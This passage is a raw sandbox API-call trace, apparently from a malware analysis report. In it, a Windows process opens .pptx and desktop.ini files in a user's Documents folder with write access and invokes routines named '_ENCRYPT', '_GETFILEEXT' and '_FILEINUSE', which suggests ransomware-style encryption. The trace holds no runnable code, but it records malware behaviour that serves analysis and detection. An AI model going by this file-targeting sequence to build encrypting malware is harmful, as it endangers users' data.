(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.785] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4f8 [0168.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0168.787] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kBHfeDGIoa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6kbhfedgioa.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.789] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.789] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0168.789] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0168.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.789] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.790] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0168.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.791] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.791] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0168.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.791] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0168.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.791] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.792] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.792] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.792] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.792] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.792] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.792] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kBHfeDGIoa.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c1a880, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xf76343c0, ftLastAccessTime.dwHighDateTime=0x1d57bc1, ftLastWriteTime.dwLowDateTime=0xf76343c0, ftLastWriteTime.dwHighDateTime=0x1d57bc1, nFileSizeHigh=0x0, nFileSizeLow=0x89e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6kBHfeDGIoa.pptx", cAlternateFileName="6KBHFE~1.PPT")) returned 0x90add8 [0168.792] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.793] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6kBHfeDGIoa.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c1a880, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xf76343c0, ftLastAccessTime.dwHighDateTime=0x1d57bc1, ftLastWriteTime.dwLowDateTime=0xf76343c0, ftLastWriteTime.dwHighDateTime=0x1d57bc1, nFileSizeHigh=0x0, nFileSizeLow=0x89e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6kBHfeDGIoa.pptx", cAlternateFileName="6KBHFE~1.PPT")) returned 0x90add8 [0168.793] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.793] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.793] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.793] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.793] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.793] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.793] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.793] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.793] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.793] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.793] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.794] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.794] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.794] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.794] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.794] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.794] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.795] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.795] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.795] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.795] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.795] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.795] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.795] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0168.796] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0168.796] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.796] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.797] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.797] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.797] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.797] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.797] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.799] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.799] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.799] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.799] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.799] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.799] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.799] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.799] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.799] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.799] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.799] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.800] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 